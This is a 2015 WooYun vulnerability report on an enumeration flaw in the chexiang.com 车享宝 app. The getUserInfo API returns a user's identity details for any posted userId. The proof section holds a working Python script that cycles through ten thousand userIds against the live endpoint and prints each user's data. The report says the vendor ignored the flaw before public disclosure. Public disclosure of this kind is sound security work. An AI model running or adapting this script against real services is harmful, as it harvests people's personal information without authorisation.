当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147952

漏洞标题:车享网用户信息遍历漏洞

相关厂商:chexiang.com

漏洞作者: 路人甲

提交时间:2015-10-20 10:04

修复时间:2015-10-25 10:06

公开时间:2015-10-25 10:06

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

-。-

详细说明:

车享网App车享宝存在如下接口:
http://cxb.chexiang.com//service/userCenter/getUserInfo/0
在用户登录过程中,此接口根据post请求的userId参数返回用户的身份信息。
但是userId未进行严格控制,导致可通过此接口遍历所有用户.

漏洞证明:

0x01.手工获取其他用户信息.

ma1.png


ma2.png


ma3.png


0x02.脚本利用.

#!/usr/bin/env python
# coding: utf-8
'''cxb.chexiang.com
[*] user traversal
'''
import requests
import json
def get_headers():
headers = {}
headers["Accept-Encoding"] = '*'
headers["saikemobilehead"] = {
"appCode":"MongoToC",
"appVersion":"2.6.0",
"clientId":"**此处隐去**",
"deviceId":"**此处隐去**",
"deviceManufacturer":"Xiaomi",
"plateformType":"android",
"sourceCode":"CXB0000",
"userAccount":"login user account",
"userToken":"**此处隐去**"
}
headers["Accept-Language"] = 'zh-cn,zh'
headers["Accept-Charset"] = 'utf-8'
headers["Content-type"] = 'application/json'
headers["Connection"] = 'close'
headers["User-Agent"] = "Dalvik/1.6.0 (Linux; U; Android 4.4.4; HM 2A MIUI/V6.7.2.0.KHLCNCH)"
headers["Host"] = 'cxb.chexiang.com'
return headers
def get_post_data(user_id):
post_data = {}
post_data["userId"] = user_id
return post_data
def get_url():
url = "http://cxb.chexiang.com/service/userCenter/getUserInfo/0"
return url
def user_traver():
atk_url = get_url()
headers = get_headers()
for id in range(3320000, 3330000):
post_data = get_post_data(id)
post_data = json.dumps(post_data)
resp = requests.post(atk_url, data=post_data, headers=headers)
print resp.json()
print
if __name__ == '__main__':
user_traver()


如下是脚本遍历的部分结果.

ma4.png


修复方案:

Null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-25 10:06

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无